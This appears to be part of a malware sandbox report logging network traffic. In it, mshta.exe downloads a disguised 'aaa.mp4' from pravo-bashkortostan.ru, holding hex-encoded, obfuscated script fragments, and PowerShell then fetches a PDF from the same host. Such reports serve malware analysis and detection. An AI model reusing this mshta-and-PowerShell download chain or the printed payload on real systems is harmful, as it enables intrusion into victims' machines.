                                                        Dec 27, 2024 08:51:49.277067900 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.277103901 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.277493000 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.324517965 CET50092443192.168.2.1094.131.118.216
                                                        Dec 27, 2024 08:51:49.324556112 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.324628115 CET4435009294.131.118.216192.168.2.10
                                                        Dec 27, 2024 08:51:49.328797102 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.328846931 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.328953028 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380084991 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380115032 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.380177021 CET44350093188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:51:49.380213022 CET50093443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:51:49.380234003 CET44350093188.132.183.159192.168.2.10

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 08:47:37.040374994 CET6473153192.168.2.101.1.1.1
                                                        Dec 27, 2024 08:47:37.552735090 CET53647311.1.1.1192.168.2.10
                                                        Dec 27, 2024 08:47:59.766514063 CET6092453192.168.2.101.1.1.1
                                                        Dec 27, 2024 08:48:14.492652893 CET6167653192.168.2.101.1.1.1
                                                        Dec 27, 2024 08:48:38.616292000 CET6094653192.168.2.101.1.1.1

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 27, 2024 08:47:37.040374994 CET192.168.2.101.1.1.10xbebeStandard query (0)pravo-bashkortostan.ruA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:47:59.766514063 CET192.168.2.101.1.1.10x6224Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:48:14.492652893 CET192.168.2.101.1.1.10x671aStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:48:38.616292000 CET192.168.2.101.1.1.10x6825Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 27, 2024 08:47:37.552735090 CET1.1.1.1192.168.2.100xbebeNo error (0)pravo-bashkortostan.ru150.241.97.10A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:47:55.129160881 CET1.1.1.1192.168.2.100xa7cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:47:55.129160881 CET1.1.1.1192.168.2.100xa7cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:47:59.992306948 CET1.1.1.1192.168.2.100x6224No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 27, 2024 08:48:14.630804062 CET1.1.1.1192.168.2.100x671aNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 27, 2024 08:48:38.847888947 CET1.1.1.1192.168.2.100x6825No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 27, 2024 08:49:14.888700008 CET1.1.1.1192.168.2.100x55feNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:49:14.888700008 CET1.1.1.1192.168.2.100x55feNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:49:38.942039013 CET1.1.1.1192.168.2.100xf971No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:49:38.942039013 CET1.1.1.1192.168.2.100xf971No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • pravo-bashkortostan.ru

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049708150.241.97.104437936C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-27 07:47:39 UTC333OUTGET /aaa.mp4 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-CH
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: pravo-bashkortostan.ru
                                                        Connection: Keep-Alive
                                                        2024-12-27 07:47:39 UTC253INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 07:47:39 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Last-Modified: Tue, 24 Dec 2024 02:55:06 GMT
                                                        ETag: "796cb-629fb3d863680"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 497355
                                                        Connection: close
                                                        Content-Type: video/mp4
                                                        2024-12-27 07:47:39 UTC7939INData Raw: 36 36 54 37 35 65 36 65 46 36 33 62 37 34 42 36 39 41 36 66 67 36 65 55 32 30 61 36 39 4c 36 38 66 37 31 45 34 63 56 36 65 62 32 38 47 37 36 70 37 31 52 37 33 4d 35 35 70 34 33 63 32 39 72 37 62 7a 37 36 69 36 31 51 37 32 44 32 30 56 35 30 61 34 65 54 37 32 4e 36 35 4b 36 66 54 37 39 6c 33 64 44 32 30 68 32 37 74 32 37 4e 33 62 5a 36 36 4d 36 66 78 37 32 6c 32 30 79 32 38 76 37 36 63 36 31 50 37 32 50 32 30 6d 36 63 58 36 35 73 35 31 76 34 33 66 36 31 46 32 30 4b 33 64 6b 32 30 48 33 30 71 33 62 55 36 63 76 36 35 70 35 31 58 34 33 66 36 31 5a 32 30 4d 33 63 48 32 30 50 37 36 72 37 31 74 37 33 41 35 35 6e 34 33 68 32 65 74 36 63 50 36 35 45 36 65 4f 36 37 45 37 34 65 36 38 76 33 62 57 32 30 54 36 63 41 36 35 51 35 31 79 34 33 68 36 31 59 32 62 68 32 62 46
                                                        Data Ascii: 66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF
                                                        2024-12-27 07:47:39 UTC8000INData Raw: 37 46 33 36 41 32 63 61 33 39 6c 33 37 78 33 31 73 32 63 76 33 39 5a 33 38 67 33 39 61 32 63 70 33 39 6b 33 38 66 33 38 64 32 63 7a 33 39 56 33 37 4d 33 32 63 32 63 48 33 39 6e 33 38 46 33 38 6a 32 63 58 33 39 6d 33 37 45 33 31 59 32 63 52 33 39 42 33 39 76 33 31 62 32 63 51 33 39 4c 33 38 4c 33 38 48 32 63 42 33 39 6f 33 37 46 33 36 47 32 63 46 33 39 5a 33 38 56 33 36 4b 32 63 68 33 39 4b 33 38 64 33 39 44 32 63 67 33 39 51 33 38 65 33 38 53 32 63 63 33 39 69 33 37 45 33 38 75 32 63 70 33 39 57 33 39 63 33 31 6f 32 63 68 33 39 59 33 39 62 33 30 74 32 63 64 33 39 45 33 36 4b 33 39 64 32 63 5a 33 39 59 33 37 62 33 34 4b 32 63 51 33 39 47 33 36 58 33 39 69 32 63 53 33 39 76 33 37 43 33 36 4e 32 63 49 33 39 41 33 37 72 33 38 42 32 63 58 33 39 63 33 37 7a 33
                                                        Data Ascii: 7F36A2ca39l37x31s2cv39Z38g39a2cp39k38f38d2cz39V37M32c2cH39n38F38j2cX39m37E31Y2cR39B39v31b2cQ39L38L38H2cB39o37F36G2cF39Z38V36K2ch39K38d39D2cg39Q38e38S2cc39i37E38u2cp39W39c31o2ch39Y39b30t2cd39E36K39d2cZ39Y37b34K2cQ39G36X39i2cS39v37C36N2cI39A37r38B2cX39c37z3
                                                        2024-12-27 07:47:39 UTC8000INData Raw: 33 39 61 33 39 74 33 30 57 32 63 6e 33 39 58 33 38 7a 33 37 52 32 63 4c 33 39 63 33 37 6b 33 38 44 32 63 59 33 39 56 33 37 6b 33 33 59 32 63 4b 33 39 4e 33 38 4b 33 39 4b 32 63 6a 33 39 43 33 37 48 33 37 45 32 63 79 33 39 58 33 36 66 33 39 69 32 63 4f 33 39 58 33 37 46 33 37 75 32 63 42 33 39 49 33 37 53 33 34 72 32 63 54 33 39 62 33 38 76 33 36 53 32 63 42 33 39 67 33 37 77 33 36 52 32 63 58 33 39 4e 33 37 56 33 37 6d 32 63 71 33 39 66 33 36 6a 33 39 73 32 63 58 33 39 75 33 38 68 33 38 6b 32 63 53 33 39 70 33 39 59 33 31 51 32 63 73 33 39 51 33 39 43 33 31 6e 32 63 58 33 39 71 33 37 42 33 38 51 32 63 43 33 39 73 33 37 45 33 35 69 32 63 52 33 39 72 33 37 4a 33 38 44 32 63 46 33 39 71 33 37 67 33 34 6b 32 63 42 33 39 73 33 37 72 33 30 6a 32 63 6f 33 39 4e
                                                        Data Ascii: 39a39t30W2cn39X38z37R2cL39c37k38D2cY39V37k33Y2cK39N38K39K2cj39C37H37E2cy39X36f39i2cO39X37F37u2cB39I37S34r2cT39b38v36S2cB39g37w36R2cX39N37V37m2cq39f36j39s2cX39u38h38k2cS39p39Y31Q2cs39Q39C31n2cX39q37B38Q2cC39s37E35i2cR39r37J38D2cF39q37g34k2cB39s37r30j2co39N
                                                        2024-12-27 07:47:39 UTC8000INData Raw: 66 32 63 68 33 39 6f 33 37 66 33 31 58 32 63 76 33 39 44 33 39 6a 33 30 68 32 63 54 33 39 48 33 37 45 33 31 6d 32 63 49 33 39 68 33 37 50 33 30 4b 32 63 68 33 39 76 33 37 7a 33 38 4c 32 63 70 33 39 4f 33 37 55 33 38 6f 32 63 66 33 39 46 33 37 6e 33 31 44 32 63 69 33 39 56 33 37 54 33 38 54 32 63 45 33 39 61 33 37 50 33 35 59 32 63 61 33 39 65 33 37 65 33 37 4c 32 63 6a 33 39 50 33 39 4b 33 31 4b 32 63 63 33 39 54 33 38 4a 33 36 48 32 63 48 33 39 78 33 38 59 33 36 66 32 63 4f 33 39 73 33 37 71 33 37 54 32 63 55 33 39 72 33 37 72 33 35 70 32 63 50 33 39 66 33 37 79 33 36 79 32 63 6f 33 39 6b 33 37 68 33 37 69 32 63 52 33 39 72 33 37 6a 33 36 44 32 63 52 33 39 6f 33 36 63 33 39 61 32 63 45 33 39 4b 33 37 4c 33 38 4c 32 63 77 33 39 67 33 37 77 33 34 6c 32 63
                                                        Data Ascii: f2ch39o37f31X2cv39D39j30h2cT39H37E31m2cI39h37P30K2ch39v37z38L2cp39O37U38o2cf39F37n31D2ci39V37T38T2cE39a37P35Y2ca39e37e37L2cj39P39K31K2cc39T38J36H2cH39x38Y36f2cO39s37q37T2cU39r37r35p2cP39f37y36y2co39k37h37i2cR39r37j36D2cR39o36c39a2cE39K37L38L2cw39g37w34l2c
                                                        2024-12-27 07:47:39 UTC8000INData Raw: 37 5a 33 33 49 32 63 49 33 39 6d 33 37 52 33 30 65 32 63 73 33 39 4e 33 37 62 33 32 4b 32 63 4d 33 39 62 33 38 50 33 36 41 32 63 6d 33 39 6b 33 37 66 33 33 6e 32 63 4a 33 39 46 33 37 75 33 34 66 32 63 4e 33 39 6e 33 37 58 33 38 73 32 63 77 33 39 78 33 37 69 33 30 6b 32 63 5a 33 39 67 33 38 65 33 38 48 32 63 4d 33 39 49 33 39 70 33 31 70 32 63 56 33 39 70 33 38 5a 33 39 52 32 63 6e 33 39 46 33 37 51 33 33 50 32 63 46 33 39 5a 33 39 67 33 30 58 32 63 43 33 39 49 33 37 61 33 32 61 32 63 43 33 39 74 33 38 75 33 37 56 32 63 4f 33 39 59 33 36 68 33 39 76 32 63 65 33 39 71 33 37 6c 33 31 66 32 63 77 33 39 48 33 37 6f 33 38 64 32 63 76 33 39 71 33 39 52 33 31 54 32 63 67 33 39 63 33 37 73 33 34 49 32 63 57 33 39 49 33 37 6e 33 35 58 32 63 52 33 39 4b 33 37 69 33
                                                        Data Ascii: 7Z33I2cI39m37R30e2cs39N37b32K2cM39b38P36A2cm39k37f33n2cJ39F37u34f2cN39n37X38s2cw39x37i30k2cZ39g38e38H2cM39I39p31p2cV39p38Z39R2cn39F37Q33P2cF39Z39g30X2cC39I37a32a2cC39t38u37V2cO39Y36h39v2ce39q37l31f2cw39H37o38d2cv39q39R31T2cg39c37s34I2cW39I37n35X2cR39K37i3
                                                        2024-12-27 07:47:39 UTC8000INData Raw: 33 39 66 33 37 72 33 34 62 32 63 5a 33 39 42 33 39 4a 33 31 75 32 63 56 33 39 69 33 39 54 33 31 76 32 63 53 33 39 46 33 38 4f 33 39 49 32 63 45 33 39 47 33 37 6a 33 38 4d 32 63 7a 33 39 62 33 37 4f 33 34 6b 32 63 53 33 39 51 33 37 6f 33 33 4f 32 63 78 33 39 6b 33 37 4e 33 38 43 32 63 54 33 39 69 33 39 75 33 31 48 32 63 49 33 39 54 33 37 5a 33 34 53 32 63 64 33 39 4e 33 37 6f 33 30 66 32 63 4a 33 39 46 33 38 4d 33 38 52 32 63 73 33 39 4e 33 37 62 33 37 4b 32 63 62 33 39 79 33 37 67 33 36 6d 32 63 52 33 39 48 33 36 4a 33 39 49 32 63 4e 33 39 75 33 37 78 33 34 6b 32 63 56 33 39 51 33 37 62 33 32 6a 32 63 4c 33 39 48 33 37 7a 33 30 6b 32 63 68 33 39 51 33 38 6a 33 37 6d 32 63 6d 33 39 6a 33 39 61 33 31 4d 32 63 44 33 39 57 33 38 56 33 36 6a 32 63 4a 33 39 43
                                                        Data Ascii: 39f37r34b2cZ39B39J31u2cV39i39T31v2cS39F38O39I2cE39G37j38M2cz39b37O34k2cS39Q37o33O2cx39k37N38C2cT39i39u31H2cI39T37Z34S2cd39N37o30f2cJ39F38M38R2cs39N37b37K2cb39y37g36m2cR39H36J39I2cN39u37x34k2cV39Q37b32j2cL39H37z30k2ch39Q38j37m2cm39j39a31M2cD39W38V36j2cJ39C
                                                        2024-12-27 07:47:40 UTC8000INData Raw: 4c 33 35 45 32 63 71 33 31 49 33 30 79 33 31 53 33 32 61 32 63 6f 33 31 4e 33 30 63 33 31 70 33 34 64 32 63 70 33 31 53 33 30 6a 33 31 72 33 34 68 32 63 74 33 39 72 33 36 64 33 31 57 32 63 41 33 39 4d 33 36 6c 33 31 78 32 63 57 33 31 4f 33 30 52 33 31 47 33 32 64 32 63 4c 33 31 74 33 30 52 33 30 4e 33 34 66 32 63 79 33 31 63 33 30 73 33 32 44 33 32 6d 32 63 67 33 31 63 33 30 6d 33 32 67 33 30 68 32 63 4f 33 31 74 33 30 4c 33 33 76 33 38 4e 32 63 42 33 31 4e 33 30 49 33 33 51 33 35 6b 32 63 4b 33 31 72 33 30 46 33 32 4c 33 36 62 32 63 45 33 31 49 33 30 68 33 33 6a 33 37 52 32 63 76 33 31 4d 33 30 62 33 34 6d 33 32 6c 32 63 4f 33 39 6f 33 36 71 33 37 46 32 63 78 33 39 74 33 38 4f 33 38 67 32 63 44 33 31 69 33 30 63 33 33 43 33 35 57 32 63 74 33 31 62 33 30
                                                        Data Ascii: L35E2cq31I30y31S32a2co31N30c31p34d2cp31S30j31r34h2ct39r36d31W2cA39M36l31x2cW31O30R31G32d2cL31t30R30N34f2cy31c30s32D32m2cg31c30m32g30h2cO31t30L33v38N2cB31N30I33Q35k2cK31r30F32L36b2cE31I30h33j37R2cv31M30b34m32l2cO39o36q37F2cx39t38O38g2cD31i30c33C35W2ct31b30
                                                        2024-12-27 07:47:40 UTC8000INData Raw: 97 f5 01 33 f7 6a 01 34 62 ba 01 34 c4 ac 01 35 17 48 01 35 65 00 01 35 b1 ec 01 35 ff be 01 36 39 6a 01 36 6f 53 01 36 ab 3b 01 36 d6 cb 01 37 1a 12 01 37 9b e5 01 37 fb 88 01 38 6d 52 01 38 ea bc 01 39 6a c5 01 39 d9 f4 01 3a 4a f4 01 3a a2 9f 01 3b 08 54 01 3b 79 c9 01 3b ee 63 01 3c 63 84 01 3c d9 23 01 3d 4b ec 01 3d c1 a0 01 3e 3a 12 01 3e bd 4d 01 3f 1d 7a 01 3f 5b ad 01 3f bd 44 01 40 03 39 01 40 50 8f 01 40 a7 e0 01 41 13 b3 01 41 85 43 01 41 f4 ed 01 42 6c 7f 01 42 f7 9f 01 43 e4 2f 01 44 f2 dd 01 45 f5 39 01 46 f0 ac 01 47 e8 55 01 48 d9 5a 01 49 b0 d7 01 4a 55 16 01 4b 24 d2 01 4b fb 86 01 4c cb aa 01 4d a2 61 01 4e 73 e0 01 4f 34 89 01 4f d5 74 01 50 5b 46 01 50 cd 6f 01 51 34 64 01 51 8e 4e 01 52 1f fb 01 52 9b e5 01 53 2b 22 01 53 bd b7 01
                                                        Data Ascii: 3j4b45H5e5569j6oS6;67778mR89j9:J:;T;y;c<c<#=K=>:>M?z?[?D@9@P@AACABlBC/DE9FGUHZIJUK$KLMaNsO4OtP[FPoQ4dQNRRS+"S
                                                        2024-12-27 07:47:40 UTC8000INData Raw: 05 7d a0 12 05 7e 80 73 05 7f 6c e8 05 80 47 4b 05 81 24 d5 05 81 ed 55 05 82 93 56 05 83 3f 33 05 83 e3 4f 05 84 75 fd 05 84 e2 bb 05 85 3e c1 05 85 96 3a 05 85 c6 a8 05 86 47 f9 05 86 fd 2e 05 87 86 29 05 88 64 17 05 89 4a e0 05 8a 2e bd 05 8b 00 9d 05 8b be 48 05 8c 6e 31 05 8d 24 1a 05 8d eb ad 05 8e 5d b7 05 8e af 00 05 8f 01 49 05 8f 64 cf 05 90 05 d0 05 91 11 d3 05 91 b6 10 05 92 65 75 05 93 18 e2 05 93 bd 07 05 94 5d d9 05 94 fc 7e 05 95 98 fd 05 96 32 01 05 96 bf 03 05 97 6b 4c 05 98 0f 5e 05 98 96 ae 05 99 77 4a 05 99 fe f6 05 9a 61 a3 05 9a ae 33 05 9a ee 15 05 9b 25 df 05 9b 4f 2a 05 9b 8c 4d 05 9b ae 1d 05 9b d5 d8 05 9c 09 fb 05 9c 65 eb 05 9c e3 78 05 9d a1 38 05 9e 0d e9 05 9e ab 80 05 a0 15 f1 05 a1 be e2 05 a2 fe 6f 05 a4 09 63 05 a4 bc
                                                        Data Ascii: }~slGK$UV?3Ou>:G.)dJ.Hn1$]Ideu]~2kL^wJa3%O*Mex8oc
                                                        2024-12-27 07:47:40 UTC8000INData Raw: 00 00 07 05 00 00 08 ac 00 00 08 a5 00 00 09 21 00 00 08 0d 00 00 08 88 00 00 08 ab 00 00 08 50 00 00 09 24 00 00 08 ca 00 00 09 98 00 00 09 f0 00 00 09 5b 00 00 09 99 00 00 09 1b 00 00 09 7f 00 00 09 5f 00 00 09 3b 00 00 0a 46 00 00 0a 90 00 00 0a 11 00 00 0a 8c 00 00 0a 67 00 00 09 43 00 00 09 51 00 00 09 85 00 00 09 36 00 00 09 51 00 00 09 ad 00 00 10 b5 00 00 0c 66 00 00 0b 1c 00 00 0b 7a 00 00 0a fd 00 00 0a a5 00 00 0a aa 00 00 0a e6 00 00 0a 79 00 00 0a 9e 00 00 0a 43 00 00 0a 73 00 00 0b 03 00 00 0b 93 00 00 0a 9f 00 00 0b 65 00 00 0a ac 00 00 0a 7e 00 00 0a 8b 00 00 0a a2 00 00 0a 74 00 00 0a 2d 00 00 0a 90 00 00 09 94 00 00 09 b1 00 00 11 ff 00 00 09 8d 00 00 09 30 00 00 09 99 00 00 09 35 00 00 09 bd 00 00 09 2e 00 00 09 e0 00 00 0a f1 00 00 0a
                                                        Data Ascii: !P$[_;FgCQ6QfzyCse~t-05.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1049728150.241.97.10443180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-27 07:47:46 UTC79OUTGET /ggg.pdf HTTP/1.1
                                                        Host: pravo-bashkortostan.ru
                                                        Connection: Keep-Alive
                                                        2024-12-27 07:47:46 UTC261INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 07:47:46 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Last-Modified: Tue, 24 Dec 2024 02:51:24 GMT
                                                        ETag: "1491ab-629fb304ac300"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1348011
                                                        Connection: close
                                                        Content-Type: application/pdf
                                                        2024-12-27 07:47:46 UTC7931INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 d3 f4 cc e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 28 44 3a 32 30 32 34 30 32 32 32 31 33 30 33 35 33 2b 30 35 27 30 30 27 29 0a 2f 43 72 65 61 74 6f 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 2f 50 72 6f 64 75 63 65 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 33 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 32 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79
                                                        Data Ascii: %PDF-1.4%1 0 obj<</CreationDate(D:20240222130353+05'00')/Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))/Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\))>>endobj2 0 obj<</Type/Catalog/Pages 3 0 R/Metadata 23 0 R>>endobj3 0 obj<</Ty
                                                        2024-12-27 07:47:46 UTC8000INData Raw: 79 de 3d 9b 49 7d 9f 27 7c 0e b4 97 10 c6 da b0 48 c8 46 39 53 81 fe cd 00 4b e4 c8 f3 49 6e 26 6f 29 a3 c1 c9 24 93 81 df f1 ac 96 91 20 75 11 12 8c 40 1b 88 e9 eb fd 6b 48 ab 5b 5d ec 5b 91 81 19 26 47 fe 13 d0 ff 00 21 59 e6 1b 66 66 12 4b f3 a1 0f bb 3c 30 cf 26 80 2d c2 63 b4 d5 4b 02 66 6f 2f 27 e5 1c f7 c8 a2 ee f6 39 2e 21 99 c3 2a 49 17 2b 8c e7 0d d2 92 32 93 dd 3c 50 5c 05 0f 18 02 40 a0 71 fe 73 4e bc 10 c5 7d 66 a1 95 a2 45 0b 9e bd c5 00 42 f7 91 6c 0b e4 92 ea 06 e5 23 04 01 9f f1 a6 cd e7 cd 31 8e 38 ca 46 7b 13 ce 40 04 d6 9e ac 63 84 ac ae 36 a3 a9 42 c0 67 19 c6 0d 57 4b a8 a5 9c b3 1f 2f 12 2b 21 61 8d c0 0c 13 f9 50 05 78 6c c2 b7 df 2a f1 0c ab e7 f8 4f 46 c7 f3 a9 6e 25 f2 61 f3 11 11 dc 36 19 3a 83 9e 32 0f a1 a0 5c 23 c2 1a 48 58
                                                        Data Ascii: y=I}'|HF9SKIn&o)$ u@kH[][&G!YffK<0&-cKfo/'9.!*I+2<P\@qsN}fEBl#18F{@c6BgWK/+!aPxl*OFn%a6:2\#HX
                                                        2024-12-27 07:47:46 UTC8000INData Raw: b7 dc 35 35 43 6a 7e 43 53 50 03 24 fb f1 ff 00 bd fd 0d 2c 9f ea cf d2 9b 2f df 8b fd ef e8 69 d2 7d c6 fa 50 04 09 fe b1 7f cf 6a b3 55 93 fd 62 ff 00 9e d5 66 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 c8 a2 80 0a 29 32 33 8c 8c fa 52 d0 01 45 19 a4 56 57 19 56 04 7a 83 40 0b 45 46 27 89 9b 6a c8 85 bd 01 e6 84 b8 85 db 6a 4a 8c de 80 d0 04 94 55 5d 42 76 86 dc f9 72 a4 72 f5 5d e7 ad 54 fe d0 9d 9e 1d e1 2d d0 f2 cc ec 0e e1 ed 40 1a b4 52 2b 06 50 ca 72 0f 20 d2 d0 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 06 66 a1 77 07 da 92 de 79 02 46 b8
                                                        Data Ascii: 55Cj~CSP$,/i}PjUbf(((()23REVWVz@EF'jjJU]Bvrr]T-@R+Pr EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPfwyF
                                                        2024-12-27 07:47:46 UTC8000INData Raw: 9f 22 19 44 72 46 dd c0 c5 26 a1 a7 de 5d 5f c7 3a 79 4a 23 c6 32 c7 9c 1c d3 af 34 fb bd 42 44 13 c9 1c 71 27 38 4c 9c d3 b0 17 65 63 75 a7 b3 5b be d3 22 65 58 f6 ac 1b 92 13 4b 8c 05 0d 24 6f 86 95 7a 67 9e 33 de b7 a7 b5 dd a7 b5 b4 2d b3 e4 da a6 b3 4e 95 79 26 9a 2d 9e 68 c6 d3 95 00 7f 33 48 0d 5b 72 64 b4 8c bf 25 90 67 3d f8 ac 9d 05 01 6b c0 54 11 9c 7e 15 ab 6b 1c 91 59 a4 6e 55 9d 57 19 1d 2b 3a ce c2 fe d1 e5 28 f0 9f 30 e4 e7 34 01 1e 82 aa 63 bc ef f3 63 a7 6a 7f 86 c7 ee 67 38 e7 cc c5 2d 8e 9d 7d 66 25 0b 2c 24 48 72 72 0d 58 d2 6c 66 b1 12 89 24 57 0e 73 c0 e9 40 14 b5 26 f2 f5 fb 77 54 2c db 01 da 3a 9e 4d 49 02 5a ea c6 4f 3c 30 99 5f 71 1d 08 1d 00 ab 57 3a 71 9f 51 8a ec 4d b4 c6 00 0b b7 34 92 69 60 ea 1f 6c 86 66 89 b1 c8 03 20 d0
                                                        Data Ascii: "DrF&]_:yJ#24BDq'8Lecu["eXK$ozg3-Ny&-h3H[rd%g=kT~kYnUW+:(04ccjg8-}f%,$HrrXlf$Ws@&wT,:MIZO<0_qW:qQM4i`lf
                                                        2024-12-27 07:47:46 UTC8000INData Raw: 92 26 85 e5 b7 76 dc 8c 83 24 7b 1a b3 6d 03 cb 7e d7 d2 a1 4f 97 64 68 7a e3 d4 d0 05 2b 4b 28 64 d6 2f 63 61 fb b5 da 42 0e 9d 29 e9 02 e9 fa e4 6b 08 db 14 ea 72 be 84 50 b3 3c 1a d5 d9 48 5a 50 54 6e 0b d7 a5 58 b7 8e 6b ab f1 77 3c 46 24 45 db 1a 37 5e 7a 93 40 11 e9 0d f6 89 6e ae 24 e5 fc cd a3 3d 87 a5 46 c3 ec da f4 42 3f 95 66 07 70 15 20 86 e3 4f bb 9a 48 63 f3 a0 94 e4 aa 9e 54 d2 c1 14 97 1a 82 dd 4c 9e 5e c1 85 42 79 fc 68 02 cd e2 ab 4d 6a 0a 82 de 6f 1f 91 a8 5d 40 d7 a2 38 e4 c2 69 91 5c cd 77 71 f6 88 ad 59 a2 8f 2a 99 60 32 7b 9a 6d c1 b9 4b f8 ef 1e dc f9 71 a9 56 0a c0 9f ad 00 6b 51 48 08 20 11 d0 d4 77 42 63 6e e2 d8 81 2e 3e 52 68 03 1a e1 26 d3 af dd 6d d4 98 ee c6 14 7f 75 ab 6a de 21 0c 09 10 e8 a3 15 4e d2 0b b9 64 8e 6b f2 bb
                                                        Data Ascii: &v${m~Odhz+K(d/caB)krP<HZPTnXkw<F$E7^z@n$=FB?fp OHcTL^ByhMjo]@8i\wqY*`2{mKqVkQH wBcn.>Rh&muj!Ndk
